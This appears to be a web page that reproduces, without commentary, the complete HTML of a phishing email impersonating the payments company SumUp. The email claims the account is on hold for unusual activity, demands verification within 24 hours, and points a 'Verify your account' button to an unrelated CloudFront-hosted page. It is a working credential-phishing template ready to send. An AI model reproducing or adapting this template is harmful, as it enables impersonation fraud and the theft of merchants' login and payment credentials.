visit our main page

Saturday, 14 February 2026

Temporary hold on your SumUp account

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width,initial-scale=1" />
<title>Account Suspended - SumUp</title>
<style>
body {
font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, 'Helvetica Neue', Arial;
background:#f7f9fb;
margin:0;
padding:40px 0;
-webkit-text-size-adjust:100%;
-ms-text-size-adjust:100%;
}
.wrap{
max-width:720px;
margin:0 auto;
background:#ffffff;
padding:48px 40px;
border-radius:6px;
border:1px solid #eef2f6;
word-break:break-word;
}
.header{display:flex;align-items:center;gap:12px;margin-bottom:28px}
.logo{height:56px;max-width:100%;display:block;}
h1{color:#0b2540;font-size:20px;margin:0 0 18px}
p{color:#243240;line-height:1.5;margin:10px 0;font-size:15px}
.lead{font-weight:600;margin-bottom:8px}
.btn-wrap{text-align:center;margin:26px 0}
.btn{
display:inline-block;
padding:12px 26px;
border-radius:8px;
background:#000000;
color:#ffffff;
text-decoration:none;
font-weight:600;
}
.muted{font-size:13px;color:#6b7280}
.footer{font-size:12px;color:#9aa3b2;margin-top:28px;border-top:1px solid #eef2f6;padding-top:18px}
a.inline-link{color:#f97316;text-decoration:none}
</style>
</head>
<body>
<div style="text-align:center;margin-bottom:18px;color:#0b2540;font-weight:700">Account Suspended - SumUp</div>

<div class="wrap" role="article" aria-label="SumUp notification">
<div class="header">
<img class="logo" src="https://i.imgur.com/pvT0rLs.png" alt="SumUp" />
</div>

<h1>Temporary hold on your SumUp account</h1>

<p class="lead">Hello,</p>

<p>We noticed unusual activity on your account. For your protection, your account is temporarily on hold. To restore access, please verify your account within <strong>24 hours</strong> by clicking the link below.</p>

<div class="btn-wrap">
<a class="btn" href="https://d15k2d11r6t6rl.cloudfront.net/pub/xc8b/vkwv7nob/q43/1z1/8io/sux.html" target="_blank" rel="noopener noreferrer">Verify your account</a>
</div>

<p class="muted">If you have already verified your account, please ignore this message. For questions, contact <a class="#" href="#">support@sumup.com</a>.</p>

<div class="footer">
<p>This email was sent automatically. The sender address is not monitored. Replies are not read.</p>
<p>© 2012–2026 SumUp</p>
<p style="text-align:right;margin-top:-28px"><a href="#" class="#">Sign out</a></p>
</div>
</div>
</body>
</html>